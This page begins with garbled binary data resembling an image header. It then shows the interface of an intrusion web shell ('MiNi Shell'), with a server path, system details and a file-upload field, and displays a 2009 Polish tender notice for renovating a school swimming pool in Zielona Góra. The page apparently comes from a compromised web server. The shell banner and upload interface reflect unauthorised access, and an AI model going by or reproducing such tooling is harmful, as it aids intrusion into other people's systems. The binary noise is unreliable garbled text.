JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090520/158408-N-2009.html

<p class="kh_header"><b>Zielona Góra: Remont odtworzeniowy  basenu Gimnazjum nr 1 przy ul. Stefana
          Wyszyńskiego   w Zielonej Górze.</b><br>
<b>Numer ogłoszenia: 158408 - 2009; data zamieszczenia: 20.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> GIMNAZJUM NR 1 , ul. Stefana Wyszyńskiego 101, 65-536 Zielona Góra, woj. lubuskie, tel. 0-68 326 36 80, faks 0-68 326 36 80.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gimnazjum1.zielonagora.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont odtworzeniowy  basenu Gimnazjum nr 1 przy ul. Stefana
          Wyszyńskiego   w Zielonej Górze..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.   Przedmiotem zamówienia jest remont odtworzeniowy  basenu Gimnazjum nr 1 przy ul. Stefana
          Wyszyńskiego   w Zielonej Górze. 
2.   Przedmiot zamówienia należy wykonać w oparciu o  Specyfikacje Techniczne Wykonania i Odbioru
          Robót  ( STWiOR) i Projekt Wykonawczy  stanowiące  załącznik  do niniejszej SIWZ.
3. Wyszczególnienie prac zawiera przedmiar robót stanowiący załącznik nr 8 do niniejszej 
         SIWZ .         
4.   Zakres zamówienia obejmuje remont odtworzeniowy istniejącego zespołu pomieszczeń basenu i 
         zaplecza sanitarno-higienicznego.
4.1 Budynek szkolny w zakresie architektoniczno-konstrukcyjnym pozostaje bez zmian.
4.2. Obiekt jest wyposażony w niżej wymienione instalacje:
- ciepła i zimna woda użytkowa, 
- woda basenowa,
- kanalizacja sanitarna,
- centralne ogrzewanie,
- wentylacja mechaniczna,
- elektryczna podłączona do istniejących rozdzielnic, które nie podlegają przebudowie (oświetlenie, gniazda wtykowe, gniazda siłowe).
4.3. Pomieszczenia basenu i zaplecza sanitarnego zlokalizowane są na parterze budynku szkoły pod salą
         gimnastyczną.
4.5. Powierzchnia pomieszczeń podlegających remontowi wynosi 557,90 m2.
4.6. W zakres prac objętych przedmiotem zamówienia wchodzą niżej wymienione roboty:
a)      roboty przygotowawcze:
1)	zrzut wody i oczyszczenie basenu oraz instalacji technologicznej	m3	150,00
2)	demontaż wyposażenia stałego i ruchomego obiektu	kpl. 	1
3)	rozbiórka okładzin ceramicznych ścian i posadzek oraz niecki basenowej 	m2	912,00
4)	rozbiórka warstw izolacyjnych (p wodnych i cieplnych) 	m2	152,00
5)	rozbiórka warstw podkładów betonowych podposadzkowych 	m3	8,00
6)	rozbiórka fragmentów ścian 	m3	0,50
7)	wycięcie otworów w stropie żelbetowym 	m3	0,60
8)	zabezpieczenie terenu robót oraz oznakowanie ostrzegawcze.	kpl.	1


b)  roboty budowlane
1)	przygotowanie powierzchni elementów tynkowanych i betonowych do robót okładzinowych i izolacyjnych 	m2	952,00
2)	izolacja powierzchni plaży basenowej 	m2	155,00
3)	podkład (jastrych cementowy) podposadzkowy z zaprawy systemowej 	m2	170,00
4)	gładzie wyrównawcze powierzchni betonowych 	m2	952,00
5)	warstwa powłokowej izolacji przeciwwodnej powierzchni hali basenu 	m2	512,00
6)	warstwa powłokowej izolacji p wodnej powierzchni zaplecza sanitarnego 	m2	358,00
7)	okładziny powierzchni pionowych i poziomych basenu i plaży z płytek i kształtek ceramicznych 	m2	504,00
8)	okładziny ceramiczne posadzek zaplecza sanitarnego basenu z płytek i kształtek ceramicznych p poślizgowych 	m2	148,00
9)	okładziny ceramiczne ścian zaplecza sanitarnego z płytek ceramicznych systemowych ściennych 	m2	292,00
10)	dostawa i zabudowa drzwi wewnętrznych płycinowych wzmocnionych z ościeżnicami metalowymi 	kpl.	10,00
11)	powłoki malarskie ścian i stropów z farby emulsyjnej akrylowej 	m2	920,00
12)	dostawa i montaż zestawów prysznicowych 	szt.	12
13)	j.w. lecz umywalka 	szt.	4
14)	j.w. lecz muszla WC 	szt.	3
15)	j.w. lecz pisuar 	szt.	1
16)	j.w. lecz grzejnik panelowy 	szt.	4
17)	j.w. lecz ścieki posadzkowe 	szt.	13
18)	j.w. lecz przewody wentylacyjne 	szt.	6
19)	j.w. lecz oprawy oświetleniowe szczelne 	szt.	20
20)	j.w. lecz suszarki do włosów 	szt.	12
21)	dostawa i montaż kratka wentylacyjna naścienna 	szt.	30
22)	j.w. lecz liny torów basenowych 	szt.	3
23)	j.w. lecz drabinki basenowe 	szt.	2
24)	j.w. lecz ławki basenowe 	szt.	8
25)	j.w. lecz zegar basenowy 	szt.	1
26)	j.w. lecz klapa włazowa 	szt.	2
27)	j.w. lecz elementy oznakowania ewakuacyjnego 	kpl.	1
28)	j.w. lecz zawór mieszający wodę 	szt.	2
29)	j.w. lecz systemowe kabiny przebieralni 	szt.	4
30)	zabetonowanie konstrukcyjne otworów 	m3	0,36
31)	remont i oczyszczenie komory zastawki 	szt.	1
32)	naprawa miejscowa ścian betonowych niecki basenowej w podbaseniu 	m2	25,00
33)	ścianki działowe z cegły pełnej gr. 12 cm 	m2	4,00
34)	malowanie kanałów wentylacji mechanicznej farbą epoksydową antykorozyjną	m2	85,00
									
5.   Wymagania organizacyjno - techniczne związane z realizacją przedmiotu zamówienia :
5.1. Remont basenu Gimnazjum nr 1  będzie odbywać się w okresie funkcjonowania
        obiektu. Dlatego też Wykonawca robót budowlanych powinien:
1)    wykonać niezbędne prace zabezpieczające teren robót budowlanych przed dostępem dzieci, rodziców,
        personelu oraz innych osób;
2)    uzgodnić sposób zabezpieczenia terenu budowy z inspektorem nadzoru oraz z dyrektorem szkoły; 
3)    okresy, w którym będą wykonywane roboty budowlane uciążliwe dla otoczenia (np. hałas) lub roboty
      stwarzające szczególne niebezpieczeństwo dla dzieci powinny być także każdorazowo uzgodnione
      przez  Wykonawcę z inspektorem nadzoru i dyrektorem szkoły;
5.2.Wszystkie prace budowlane należy wykonywać zgodnie ze STWiOR -    (Specyfikacją techniczną
       wykonania i odbioru robót) oraz Projektem Wykonawczym. Wszelkie roboty ulegające zakryciu 
       i zanikające muszą   być odebrane przez inspektora nadzoru.
5.3.  Wszystkie wbudowywane materiały muszą posiadać stosowne certyfikaty lub aprobaty techniczne. 
5.4. Obiekty (elementy) budowlane po wykonaniu powinny być poddane odbiorowi technicznemu 
         (zgodnie    z wymaganiami przepisów) i przekazane w tym terminie do użytku. 
5.5.Utylizacja odpadów - zgodnie z wytycznymi zawartymi w STWiOR i ogólnymi 
          przepisami.
5.6.  Basen  powinien spełniać wszelkie warunki określone:
1)    ustawą z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2006 r. Nr 156, poz. 1118 - t. j. 
         z późn. zm;
2)    Zarządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 12.03.1996r. w sprawie dopuszczalnych
         stężeń i natężeń czynników szkodliwych dla zdrowia, wydzielanych przez materiały budowlane,
        urządzenia i elementy wyposażenia w pomieszczeniach przeznaczonych na pobyt ludzi,
3)  ustawą z dnia 24 sierpnia 1991 roku o ochronie przeciwpożarowej (Dz. U. z 2002 r. Nr 147, poz.
      1229   - j.t. z późn. zm.).
5.7. Zgodnie z postanowieniami Zgłoszenia  o remoncie   kierownik robót jest obowiązany: 
1)  co najmniej na 7 dni przed rozpoczęciem robót przekazać dyrektorowi Szkoły oświadczenia
       kierownika robót stwierdzające sporządzenie planu bezpieczeństwa pracy i ochrony zdrowia oraz
       przyjęcie obowiązku kierowania robotami budowlanymi, a także zaświadczenie, o którym mowa
       w art. 12 ust. 7 ustawy - Prawo budowlane.
6. Obowiązki Zamawiającego na etapie realizacji przedmiotu zamówienia:
1)   przekazania Wykonawcy 1 kompletu STWiOR i Projektu Wykonawczego  najpóźniej w dniu podpisania
      umowy,
2)   wskazanie miejsca na zaplecze budowy i przekazania terenu budowy w terminie do 3 dni po 
      podpisaniu    umowy,
3)   zapewnienia nadzoru inwestorskiego,
4)   dokonania odbioru końcowego przedmiotu umowy, 
5)   zapewnienie nadzoru autorskiego ( osoby, która opracowała specyfikacje techniczna wykonania i 
      odbioru robót oraz projekt wykonawczy).
7.Uwaga! Wszelkie nazwy własne użyte w niniejszej SIWZ należy traktować jako wskazanie
        parametrów jakościowych i należy je rozumieć jako takie lub równoważne. 
8. Wykonawca na wykonany przedmiot zamówienia udzieli gwarancji należytego wykonania robót
        na okres 36 miesięcy od dnia odbioru końcowego  oraz rękojmi za wady robót na okres
        przekraczający gwarancję o    6 miesięcy.
9. Wyłoniony Wykonawca zobowiązany jest dostarczyć Zamawiającemu przed podpisaniem umowy
         kopie  aktualnej polisy ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności 
         gospodarczej  o wartości minimum 300.000, 00 zł obejmującej okres realizacji i wartości zamówienia
         obejmującej okres realizacji i wartości zamówienia. W przypadku, gdy termin obowiązywania polisy
         będzie się kończył przed terminem zakończenia umowy, Wykonawca na 7 dni przed upływem tego
         terminu, ma obowiązek przedłożyć Zamawiającemu dokument o kontynuacji ubezpieczenia.
10. Wyłoniony Wykonawca zobowiązany jest dostarczyć Zamawiającemu przed podpisaniem umowy
          harmonogram rzeczowo-finansowy robót i terminów realizacji.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.12-5, 45.33.00.00-9, 45.31.43.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie  przewiduje  wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.1. Zrealizowali w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotę budowlaną 
w zakresie remontu, przebudowy lub rozbudowy  basenów , udokumentowaną, że została    wykonana należycie;
1.2. Dysponują osobami  lub będą nimi dysponować, które będą uczestniczyć 
w wykonywaniu zamówienia, należącymi do właściwej izby samorządu zawodowego 
i posiadającymi uprawnienia budowlane do kierowania robotami budowlanymi zgodnie 
z wymogami ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2006 r. Nr 156, 
poz. 1118 - tekst jednolity z późn. zm.) w specjalności:
a.	konstrukcyjno - budowlanej bez ograniczeń (kierownik budowy)   potwierdzone aktualnym zaświadczeniem   wydanym przez właściwą izbę samorządu   zawodowego;
b.	instalacyjnej w zakresie sieci , instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń potwierdzone aktualnym zaświadczeniem   wydanym przez właściwą izbę samorządu   zawodowego;
c.	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w ograniczonym zakresie  ( uprawnienia  E  o napięciu do 1 kv) potwierdzone aktualnym zaświadczeniem   wydanym przez właściwą izbę samorządu   zawodowego.
2.  	Ocena spełniania warunków udziału w postępowaniu zostanie dokonana zgodnie z formułą   spełnia - nie spełnia , w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 6.1.3) - 6.1.10) SIWZ.
3. 	Niespełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem Wykonawcy z postępowania z uwzględnieniem art. 26 ust 3 ustawy pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1     Dokumenty i oświadczenia wymagane od Wykonawcy ubiegającego się o zamówienie:
1)	wypełniony formularz oferty wg załącznika Nr 1 do SIWZ;
2)	oświadczenie, że Wykonawca wykona zamówienie własnymi siłami lub określi część zamówienia, której wykonanie powierzy Podwykonawcom wg załącznika Nr 2 do SIWZ;
3)	wypełnione i podpisane oświadczenie o spełnianiu warunków art. 22 ust. 1 pkt 1 - 3 ustawy pzp wg załącznika Nr 3 do SIWZ;
4)	wypełnione i podpisane oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie 
art. 24 ust. 1 i ust. 2 ustawy pzp wg załącznika Nr 4 do SIWZ;
5)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
6)     aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu
         Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzonych
         odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie
         zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie
          lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego
          organu - wystawionych nie wcześniej niż 3 miesiące  przed upływem terminu składania ofert; 
7)   wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia
          postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - 
          w tym okresie, odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot
          zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem
          dokumentów potwierdzających, że roboty te zostały wykonane należycie wg załącznika Nr 5 
          do SIWZ na potwierdzenie spełnienia warunku określonego w punkcie 5.1.1. SIWZ;
8)   wykaz osób i podmiotów, którymi dysponuje lub będzie dysponował Wykonawca i które będą
         uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych,
          do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności wg załącznika nr 6
          do SIWZ - na potwierdzenie spełnienia  warunku określonego w punkcie 5.1.2.a, b,c SIWZ;
9)     pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia,
         jeżeli w wykazie, o którym mowa w pkt 6.1.8 SIWZ Wykonawca wskazał osoby, którymi będzie
         dysponował - na potwierdzenie spełnienia warunku określonego w punkcie 5.1.2.a,b,c SIWZ;
10)    dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają
         wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - tj.
         dokumenty potwierdzające posiadanie uprawnień w wymienionych w punkcie 5.1.2. SIWZ branżach
         oraz dokumenty potwierdzające przynależność do właściwej izby samorządu zawodowego - na
         potwierdzenie spełnienia warunku określonego w punkcie 5.1.2.a,b,c SIWZ;  
11)   zaakceptowany projekty umowy wg załącznika Nr 7 do SIWZ;
12)   dokładnie wypełniony kosztorys ofertowy ( w polskich złotych , z dokładnością do dwóch miejsc po
         przecinku) wg załącznika nr 8 do SIWZ
13) pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania
         Wykonawcy, o ile ofertę składa pełnomocnik lub przedstawiciel Wykonawcy.
2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,
         zamiast dokumentów, o których mowa w:
2.1. pkt 6.1.5) SIWZ składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce
           zamieszkania, potwierdzający odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono
           upadłości. Dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu
           składania ofert;
2.2.  pkt 6.1.6) składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania,
           potwierdzające, że nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne 
           i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty
           zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. Dokumenty
           powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce
          zamieszkania, nie wydaje się dokumentu o których mowa w pkt 6.2. SIWZ, zastępuje się go
          dokumentami zawierającymi oświadczenie złożone przed notariuszem, właściwym organem
          sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego
          odpowiednio kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gimnazjum1.zielonagora.com.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gimnazjum Nr ul. Stefana Wyszyńskiego 101, 65-536 Zielona Góra, faks 068 326 36 80.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2009 godzina 09:00, miejsce: Gimnazjum  nr 1 , ul. Stefana Wyszyńskiego 101, 65-536 Zielona Góra, pokój nr 3 ( wejście od strony parkingu)  w terminie do dnia  12 czerwca  2009 roku do   godz. 09:00.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com